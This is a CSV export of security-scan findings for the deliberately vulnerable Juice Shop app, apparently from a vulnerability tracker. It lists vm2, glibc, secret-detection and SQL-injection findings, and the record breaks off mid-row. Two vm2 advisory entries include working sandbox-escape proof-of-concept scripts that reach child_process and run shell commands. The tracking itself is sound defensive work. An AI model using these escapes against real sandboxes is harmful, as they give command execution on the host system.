https://github.com/patriksimek/vm2/releases/tag/v3.10.2 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-99p7-6v5w-7xg8 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-22709,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2026-22709 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.574092+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-22709,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.610081+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,0,2026-05-12,,,"vm2 has sandbox breakout via `neutralizeArraySpeciesBatch` NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.11.2 NEWLINE NEWLINE ### Summary NEWLINE NEWLINE VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. NEWLINE NEWLINE ### Details NEWLINE NEWLINE The new method `neutralizeArraySpeciesBatch` works with objects from the other side but can call into this side via getter on the array prototype exposing objects of the wrong side into the sandbox. This can be used to get host objects and get the host `Function` object. NEWLINE NEWLINE ### PoC NEWLINE NEWLINE ```js NEWLINE const {VM} = require(""vm2""); NEWLINE const vm = new VM(); NEWLINE console.log(vm.run(` NEWLINE const a = []; NEWLINE Object.defineProperty(Array.prototype, 0, { NEWLINE set(value) { NEWLINE a.f = Buffer.prototype.inspect; NEWLINE value.arr.f.constructor.constructor(""return process"")().mainModule.require('child_process').execSync('touch pwned'); NEWLINE } NEWLINE }); NEWLINE new Buffer(a); NEWLINE `)); NEWLINE ``` NEWLINE NEWLINE ### Impact NEWLINE NEWLINE Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,87bac3f1404ab55d779ac5bacf9ae58e60c875b164734497e0e68045df04bc57,232,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.610167+00:00,,,,,0,[],3.11.2,,S0,False,,,,,,,,False,https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/releases/tag/v3.11.2 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-9qj6-qjgg-37qq,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2026-44008 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.610093+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-44008,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.605285+00:00,CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H,9.1,,,0,2026-05-12,,,"vm2 NodeVM `nesting: true` bypasses `require: false` allowing sandbox escape and arbitrary OS command execution NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.11.1 NEWLINE NEWLINE ### Summary NEWLINE NEWLINE When a `NodeVM` is created with `nesting: true`, sandbox code can unconditionally `require('vm2')` regardless of the outer VM's `require` configuration — including `require: false`. With access to `vm2`, the sandbox constructs a new inner `NodeVM` with its own unrestricted `require` settings and executes arbitrary OS commands on the host. Any application that runs untrusted code inside a `NodeVM` with `nesting: true` is fully compromised. NEWLINE NEWLINE ### Details NEWLINE NEWLINE The vulnerability is in how the `nesting: true` option interacts with the legacy module resolver. NEWLINE NEWLINE **`lib/nodevm.js:96-99`** — `NESTING_OVERRIDE` is a special builtin map that injects the `vm2` package into the sandbox: NEWLINE NEWLINE ```js NEWLINE const NESTING_OVERRIDE = Object.freeze({ NEWLINE __proto__: null, NEWLINE vm2: vm2NestingLoader NEWLINE }); NEWLINE ``` NEWLINE NEWLINE **`lib/nodevm.js:268-269`** — When `nesting: true`, this override is passed into the resolver factory alongside the host's `require` options: NEWLINE NEWLINE ```js NEWLINE const customResolver = requireOpts instanceof Resolver; NEWLINE const resolver = customResolver ? requireOpts : makeResolverFromLegacyOptions( NEWLINE requireOpts, NEWLINE nesting && NESTING_OVERRIDE, // ← injected when nesting:true NEWLINE this._compiler NEWLINE ); NEWLINE ``` NEWLINE NEWLINE **`lib/resolver-compat.js:193-197`** — This is the vulnerable branch. When `require: false` is set, `requireOpts` is falsy, so `!options` is true. Without nesting the function returns `DENY_RESOLVER` (block everything). With nesting, it instead builds a resolver that includes `vm2` from `NESTING_OVERRIDE`: NEWLINE NEWLINE ```js NEWLINE function makeResolverFromLegacyOptions(options, override, compiler) { NEWLINE if (!options) { NEWLINE if (!override) return DENY_RESOLVER; // require:false, no nesting → deny all NEWLINE // BUG: require:false + nesting:true reaches here NEWLINE // override (NESTING_OVERRIDE) is applied, making vm2 available NEWLINE const builtins = makeBuiltinsFromLegacyOptions(undefined, defaultRequire, undefined, override); NEWLINE return new Resolver(DEFAULT_FS, [], builtins); // vm2 is now requireable NEWLINE } NEWLINE // ... NEWLINE } NEWLINE ``` NEWLINE NEWLINE **`lib/builtin.js:102-106`** — `NESTING_OVERRIDE` is merged unconditionally into builtins, overriding any user-configured allowlist: NEWLINE NEWLINE ```js NEWLINE if (overrides) { NEWLINE const keys = Object.getOwnPropertyNames(overrides); NEWLINE for (const key of keys) { NEWLINE res.set(key, overrides[key]); // vm2 always injected when nesting:true NEWLINE } NEWLINE } NEWLINE ``` NEWLINE NEWLINE The result: `require('vm2')` always succeeds inside a `NodeVM` with `nesting: true`, regardless of `require: false`, `require: { builtin: [] }`, or any other restriction. Once the sandbox has `vm2`, it creates a new inner `NodeVM` with whatever `require` config it chooses — unconstrained by the outer VM — and reaches `child_process`. NEWLINE NEWLINE This was introduced in commit `2353ce60` (Feb 8, 2022) and survived a major refactor in commit `9e2b6051` (Apr 8, 2023). The JSDoc for `nesting` does warn that ""scripts can create a NodeVM which can require any host module,"" but does not document that `nesting: true` silently defeats `require: false`, which is the non-obvious part of this interaction. NEWLINE NEWLINE ### PoC NEWLINE NEWLINE **Requirements:** vm2 installed, Node.js v22.22.1 (also reproduced on earlier versions). NEWLINE NEWLINE ```js NEWLINE const { NodeVM } = require('vm2'); NEWLINE NEWLINE // Host intends: nesting enabled, but require completely disabled NEWLINE const vm = new NodeVM({ nesting: true, require: false }); NEWLINE NEWLINE const result = vm.run(` NEWLINE // Step 1: require('vm2') succeeds despite require:false on the outer VM NEWLINE const { NodeVM: NVM } = require('vm2'); NEWLINE NEWLINE // Step 2: create an inner NodeVM with attacker-chosen require config NEWLINE // This inner VM has no relation to the outer VM's restrictions NEWLINE const inner = new NVM({ require: { builtin: ['child_process'] } }); NEWLINE NEWLINE // Step 3: execute arbitrary OS command in the inner VM NEWLINE module.exports = inner.run( NEWLINE 'module.exports = require(""child_process"").execSync(""id"").toString()' NEWLINE ); NEWLINE `); NEWLINE NEWLINE console.log(result); NEWLINE // uid=1000(akshat) gid=1000(akshat) groups=1000(akshat),4(adm),... NEWLINE ``` NEWLINE NEWLINE **Observed output (confirmed on Node v22.22.1, vm2 commit `8dd0591`):** NEWLINE ``` NEWLINE uid=1000(akshat) gid=1000(akshat) groups=1000(akshat),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),104(kvm),118(lpadmin),989(docker),990(ollama),991(nordvpn) NEWLINE ``` NEWLINE NEWLINE The variant with `require: false` also works — the outer VM's require setting has no effect: NEWLINE NEWLINE ```js NEWLINE new NodeVM({ nesting: true, require: false }).run(` NEWLINE const { NodeVM: NVM } = require('vm2'); NEWLINE module.exports = new NVM({ require: { builtin: ['child_process'] } }) NEWLINE .run('module.exports = require(""child_process"").execSync(""id"").toString()'); NEWLINE `); NEWLINE // uid=1000(akshat) ... NEWLINE ``` NEWLINE NEWLINE Narrow builtin allowlists are also bypassed. `require: { builtin: ['path'] }` still allows `require('vm2')` when nesting is enabled. NEWLINE NEWLINE ### Impact NEWLINE NEWLINE **Who is affected:** Any application that runs untrusted or user-supplied code inside a `NodeVM` with `nesting: true`. This includes multi-tenant code execution platforms, notebook/REPL services, plugin systems, and CI sandboxing tools that use vm2. NEWLINE NEWLINE **What an attacker can do:** Execute arbitrary OS commands as the host process user. From there: read/write files, exfiltrate secrets from the environment, move laterally on the host network, or establish persistence. NEWLINE NEWLINE **Severity:** The mental model mismatch is the core danger. A developer who sets `require: false` to lock down modules, then adds `nesting: true` to allow child VM creation, will believe the sandbox is restricted. It is not — `require: false` is silently overridden and the sandbox has unrestricted OS access. NEWLINE NEWLINE **Note:** `nesting: true` must be set by the host. This is not a zero-cooperation escape from a default `NodeVM`. However, it is not pure misconfiguration either: the implementation defeats a strong and reasonable expectation (`require: false` should mean deny all), and the existing warning in the docs does not surface the `require: false` bypass specifically. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,739af6f91ddb58727b24501d4cfb47a3b64ae31e15b0c93b53e6925db27471e6,231,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.605340+00:00,,,,,0,[],3.11.1,,S0,False,,,,,,,,False,https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/releases/tag/v3.11.1 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-8hg8-63c5-gwmx,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2026-44007 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.605293+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-44007,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.570102+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,78,2026-05-12,,,"vm2: custom inspect function allows attackers to escape the sandbox and run arbitrary code NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** NEWLINE NEWLINE vm2 is an open source vm/sandbox for Node.js. In vm2 for versions up to and including 3.9.19, Node.js custom inspect function allows attackers to escape the sandbox and run arbitrary code. This may result in Remote Code Execution, assuming the attacker has arbitrary code execution primitive inside the context of vm2 sandbox. There are no patches and no known workarounds. Users are advised to find an alternative software. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,False,,False,False,,False,,9da8ce361021854d554478d9add301e8864240f61d066ef423174229023e6039,222,affected,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.570157+00:00,,,,,0,[],,,S0,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2023-37903 NEWLINE https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-g644-9gfx-q4q4 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2023-37903 NEWLINE https://security.netapp.com/advisory/ntap-20230831-0007 NEWLINE https://security.netapp.com/advisory/ntap-20230831-0007/ NEWLINE https://security.netapp.com/advisory/ntap-20241108-0002 NEWLINE https://security.netapp.com/advisory/ntap-20241108-0002/ NEWLINE https://www.cve.org/CVERecord?id=CVE-2023-37903,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2023-37903 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.570110+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2023-37903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.566676+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,94,2026-05-12,,,"vm2: Promise handler sanitization can be bypassed allowing attackers to escape the sandbox and run arbitrary code NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.10.0 NEWLINE NEWLINE vm2 is an advanced vm/sandbox for Node.js. The library contains critical security issues and should not be used for production. The maintenance of the project has been discontinued. In vm2 for versions up to 3.9.19, `Promise` handler sanitization can be bypassed with the `@@species` accessor property allowing attackers to escape the sandbox and run arbitrary code, potentially allowing remote code execution inside the context of vm2 sandbox. Version 3.10.0 contains a patch for the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,770b98428899ad7b461c0611a7805fad579e6abcea4e41b730e46c05c4597c3f,221,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.566728+00:00,,,,,0,[],3.10.0,,S0,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2023-37466 NEWLINE https://gist.github.com/leesh3288/f693061e6523c97274ad5298eb2c74e9 NEWLINE https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/commit/d9a1fde8ec5a5a9c9e5a69bf91d703950859d744 NEWLINE https://github.com/patriksimek/vm2/releases/tag/v3.10.0 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2023-37466 NEWLINE https://security.netapp.com/advisory/ntap-20230831-0007 NEWLINE https://security.netapp.com/advisory/ntap-20241108-0002 NEWLINE https://security.netapp.com/advisory/ntap-20241108-0002/ NEWLINE https://www.cve.org/CVERecord?id=CVE-2023-37466,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2023-37466 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.566683+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2023-37466,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.563199+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,74,2026-05-12,,,vm2: Sandbox Escape NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.9.18 NEWLINE NEWLINE vm2 is a sandbox that can run untrusted code with Node's built-in modules. A sandbox escape vulnerability exists in vm2 for versions up to and including 3.9.17. It abuses an unexpected creation of a host object based on the specification of `Proxy`. As a result a threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version `3.9.18` of `vm2`. Users are advised to upgrade. There are no known workarounds for this vulnerability. NEWLINE ,False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,5de45cc1a7c6c380875f2116cfa9b46556d7b1a4d8470d5dc6d7ad043e24a648,220,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.563254+00:00,,,,,0,[],3.9.18,,S0,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2023-32314 NEWLINE https://gist.github.com/arkark/e9f5cf5782dec8321095be3e52acf5ac NEWLINE https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/commit/d88105f99752305c5b8a77b63ddee3ec86912daf NEWLINE https://github.com/patriksimek/vm2/releases/tag/3.9.18 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-whpj-8f3w-67p5 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2023-32314 NEWLINE https://www.cve.org/CVERecord?id=CVE-2023-32314,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2023-32314 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.563207+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2023-32314,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],,,2026-05-12 17:37:05.660090+00:00,,,,,0,2026-05-12,,,Asymmetric Private Key NEWLINE **Category:** AsymmetricPrivateKey NEWLINE **Match:** ----BEGIN RSA PRIVATE KEY-----****************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************-----END RSA PRIVATE NEWLINE ,False,,,False,,,,False,/juice-shop/lib/insecurity.ts,,True,,False,False,,False,,6cb69ea20f84ada1d56684358f2099360cdfd4aafd49206b774d90ffabbfa021,245,,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.660146+00:00,23,,,,0,[],,,S1,False,,,,,,,,False,,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,Secret Detected in /juice-shop/lib/insecurity.ts - Asymmetric Private Key,False,False,,2026-05-12 17:37:05.660097+00:00,,False,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,,secret,Active, +,,True,0,[],,,2026-05-12 17:37:04.518525+00:00,,,,,89,2026-05-12,,,"**Result message:** Detected a sequelize statement that is tainted by user-input. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements. NEWLINE ",False,,,False,,,,False,/src/data/static/codefixes/dbSchemaChallenge_1.ts,,,,False,False,,False,,96a782d96c35b919a694819c27defa3d6eb3fc5847c30a720c626174c484f036,2,,False,,False,2026-05-12 17:37:04.489502+00:00,Admin User (admin),1,2026-05-12 17:37:04.518582+00:00,5,,,,0,[],,1,S1,False,,,,,,,,False,https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Semgrep JSON Report,2,0,javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection,False,False,,2026-05-12 17:37:04.518534+00:00,,False,,javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection,,Semgrep JSON Report,1,Labs Security Testing,1,Juice Shop,,,,Active, +,,True,0,[],,,2026-05-12 17:37:04.522346+00:00,,,,,89,2026-05-12,,,"**Result message:** Detected a sequelize statement that is tainted by user-input. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements. NEWLINE ",False,,,False,,,,False,/src/data/static/codefixes/dbSchemaChallenge_3.ts,,,,False,False,,False,,01082c2e3b0d087751b2b5a5de33426a8c955da41140cd6cc549631147555033,3,,False,,False,2026-05-12 17:37:04.489502+00:00,Admin User (admin),1,2026-05-12 17:37:04.522416+00:00,11,,,,0,[],,1,S1,False,,,,,,,,False,https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Semgrep JSON Report,2,0,javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection,False,False,,2026-05-12 17:37:04.522358+00:00,,False,,javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection,,Semgrep JSON Report,1,Labs Security Testing,1,Juice Shop,,,,Active, +,,True,0,[],,,2026-05-12 17:37:04.525786+00:00,,,,,89,2026-05-12,,,"**Result message:** Detected a sequelize statement that is tainted by user-input. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements. NEWLINE ",False,,,False,,,,False,/src/data/static/codefixes/unionSqlInjectionChallenge_1.ts,,,,False,False,,False,,ff96577206ffc5ef88468f2a16d9dec6744398620a4a59c51ecfb7d5e984a12e,4,,False,,False,2026-05-12 17:37:04.489502+00:00,Admin User (admin),1,2026-05-12 17:37:04.525842+00:00,6,,,,0,[],,1,S1,False,,,,,,,,False,https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Semgrep JSON Report,2,0,javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection,False,False,,2026-05-12 17:37:04.525795+00:00,,False,,javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection,,Semgrep JSON Report,1,Labs Security Testing,1,Juice Shop,,,,Active, +,,True,0,[],,,2026-05-12 17:37:04.529077+00:00,,,,,89,2026-05-12,,,"**Result message:** Detected a sequelize statement that is tainted by user-input. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements. NEWLINE ",False,,,False,,,,False,/src/data/static/codefixes/unionSqlInjectionChallenge_3.ts,,,,False,False,,False,,e4cf67f59b27847f530768137bbd364d0adffc5f43d4e2faeb22d829b39d7ab7,5,,False,,False,2026-05-12 17:37:04.489502+00:00,Admin User (admin),1,2026-05-12 17:37:04.529136+00:00,10,,,,0,[],,1,S1,False,,,,,,,,False,https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Semgrep JSON Report,2,0,javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection,False,False,,2026-05-12 17:37:04.529086+00:00,,False,,javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection,,Semgrep JSON Report,1,Labs Security Testing,1,Juice Shop,,,,Active, +,,True,0,[],,,2026-05-12 17:37:04.559694+00:00,,,,,89,2026-05-12,,,"**Result message:** Detected a sequelize statement that is tainted by user-input. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements. NEWLINE ",False,,,False,,,,False,/src/routes/login.ts,,,,False,False,,False,,18cf39067c5c99611bd071fc090cc6ab2730c0b342ddb473583abbf12fa8d8d0,14,,False,,False,2026-05-12 17:37:04.489502+00:00,Admin User (admin),1,2026-05-12 17:37:04.559756+00:00,34,,,,0,[],,1,S1,False,,,,,,,,False,https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Semgrep JSON Report,2,0,javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection,False,False,,2026-05-12 17:37:04.559703+00:00,,False,,javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection,,Semgrep JSON Report,1,Labs Security Testing,1,Juice Shop,,,,Active, +,,True,0,[],,,2026-05-12 17:37:04.573198+00:00,,,,,89,2026-05-12,,,"**Result message:** Detected a sequelize statement that is tainted by user-input. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements. NEWLINE ",False,,,False,,,,False,/src/routes/search.ts,,,,False,False,,False,,1bf0b263903752029aa809a978cd26d8d2a2bf32c9585422c88e70e7a3a6947a,18,,False,,False,2026-05-12 17:37:04.489502+00:00,Admin User (admin),1,2026-05-12 17:37:04.573255+00:00,23,,,,0,[],,1,S1,False,,,,,,,,False,https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Semgrep JSON Report,2,0,javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection,False,False,,2026-05-12 17:37:04.573206+00:00,,False,,javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection,,Semgrep JSON Report,1,Labs Security Testing,1,Juice Shop,,,,Active, +,,True,0,[],,,2026-05-12 17:37:04.576533+00:00,,,,,95,2026-05-12,,,**Result message:** Found data from an Express or Next web request flowing to `eval`. If this data is user-controllable this can lead to execution of arbitrary system commands in the context of your application process. Avoid `eval` whenever possible. NEWLINE ,False,,,False,,,,False,/src/routes/userProfile.ts,,,,False,False,,False,,eb9f5c7fbc7059d112c8d40c166d5378cfdea907628e793c1172ee4e7828fb4e,19,,False,,False,2026-05-12 17:37:04.489502+00:00,Admin User (admin),1,2026-05-12 17:37:04.576587+00:00,62,,,,0,[],,1,S1,False,,,,,,,,False,https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval NEWLINE https://nodejs.org/api/child_process.html#child_processexeccommand-options-callback NEWLINE https://www.stackhawk.com/blog/nodejs-command-injection-examples-and-prevention/ NEWLINE https://ckarande.gitbooks.io/owasp-nodegoat-tutorial/content/tutorial/a1_-_server_side_js_injection.html,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Semgrep JSON Report,2,0,javascript.lang.security.audit.code-string-concat.code-string-concat,False,False,,2026-05-12 17:37:04.576541+00:00,,False,,javascript.lang.security.audit.code-string-concat.code-string-concat,,Semgrep JSON Report,1,Labs Security Testing,1,Juice Shop,,,,Active, +,,True,0,[],libc6,2.36-9+deb12u10,2026-05-12 17:37:04.786432+00:00,CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H,7.0,,,426,2026-05-12,,,glibc: static setuid binary dlopen may incorrectly search LD_LIBRARY_PATH NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** 2.36-9+deb12u11 NEWLINE NEWLINE Untrusted LD_LIBRARY_PATH environment variable vulnerability in the GNU C Library version 2.27 to 2.38 allows attacker controlled loading of dynamically shared library in statically compiled setuid binaries that call dlopen (including internal dlopen calls after setlocale or calls to NSS functions such as getaddrinfo). NEWLINE ,False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,True,,False,False,,False,,88b6933a6ff101c19c561fdefeb2cd852dad759069e45fa003a4f127f7b77945,28,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.786539+00:00,,,,,0,[],2.36-9+deb12u11,,S1,False,,,,,,,,False,http://www.openwall.com/lists/oss-security/2025/05/16/7 NEWLINE http://www.openwall.com/lists/oss-security/2025/05/17/2 NEWLINE https://access.redhat.com/errata/RHSA-2025:8655 NEWLINE https://access.redhat.com/security/cve/CVE-2025-4802 NEWLINE https://bugzilla.redhat.com/2367468 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2367468 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4802 NEWLINE https://errata.almalinux.org/9/ALSA-2025-8655.html NEWLINE https://errata.rockylinux.org/RLSA-2025:8655 NEWLINE https://inbox.sourceware.org/libc-announce/3ac997b0-28a5-4129-af53-675efe4c2dec@redhat.com/T/#u NEWLINE https://linux.oracle.com/cve/CVE-2025-4802.html NEWLINE https://linux.oracle.com/errata/ELSA-2025-8686.html NEWLINE https://lists.debian.org/debian-lts-announce/2025/05/msg00033.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2025-4802 NEWLINE https://sourceware.org/bugzilla/show_bug.cgi?id=32976 NEWLINE https://sourceware.org/cgit/glibc/commit/?id=1e18586c5820e329f741d5c710275e165581380e NEWLINE https://sourceware.org/cgit/glibc/commit/?id=5451fa962cd0a90a0e2ec1d8910a559ace02bba0 NEWLINE https://ubuntu.com/security/notices/USN-7541-1 NEWLINE https://www.cve.org/CVERecord?id=CVE-2025-4802 NEWLINE https://www.openwall.com/lists/oss-security/2025/05/16/7 NEWLINE https://www.openwall.com/lists/oss-security/2025/05/17/2,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2025-4802 Libc6 2.36-9+deb12u10,False,False,,2026-05-12 17:37:04.786449+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2025-4802,debian; os-pkgs,"Active, Verified", +,,True,0,[],libc6,2.36-9+deb12u10,2026-05-12 17:37:04.792366+00:00,CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H,8.1,,,190,2026-05-12,,,"glibc: Integer overflow in memalign leads to heap corruption NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** NEWLINE NEWLINE Passing too large an alignment to the memalign suite of functions (memalign, posix_memalign, aligned_alloc) in the GNU C Library version 2.30 to 2.42 may result in an integer overflow, which could consequently result in a heap corruption. NEWLINE NEWLINE Note that the attacker must have control over both, the size as well as the alignment arguments of the memalign function to be able to exploit this. The size parameter must be close enough to PTRDIFF_MAX so as to overflow size_t along with the large alignment argument. This limits the malicious inputs for the alignment for memalign to the range [1<<62+ 1, 1<<63] and exactly 1<<63 for posix_memalign and aligned_alloc. NEWLINE NEWLINE Typically the alignment argument passed to such functions is a known constrained quantity (e.g. page size, block size, struct sizes) and is not attacker controlled, because of which this may not be easily exploitable in practice. An application bug could potentially result in the input alignment being too large, e.g. due to a different buffer overflow or integer overflow in the application or its dependent libraries, but that is again an uncommon usage pattern given typical sources of alignments. NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,False,,False,False,,False,,020cb0ec26772da3ef6d80082585eb62a85f5e296811e690c47540bdce0ff70f,29,affected,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.792464+00:00,,,,,0,[],,,S1,False,,,,,,,,False,http://www.openwall.com/lists/oss-security/2026/01/16/5 NEWLINE https://access.redhat.com/errata/RHSA-2026:2786 NEWLINE https://access.redhat.com/security/cve/CVE-2026-0861 NEWLINE https://bugzilla.redhat.com/2429771 NEWLINE https://bugzilla.redhat.com/2430201 NEWLINE https://bugzilla.redhat.com/2431196 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2429771 NEWLINE 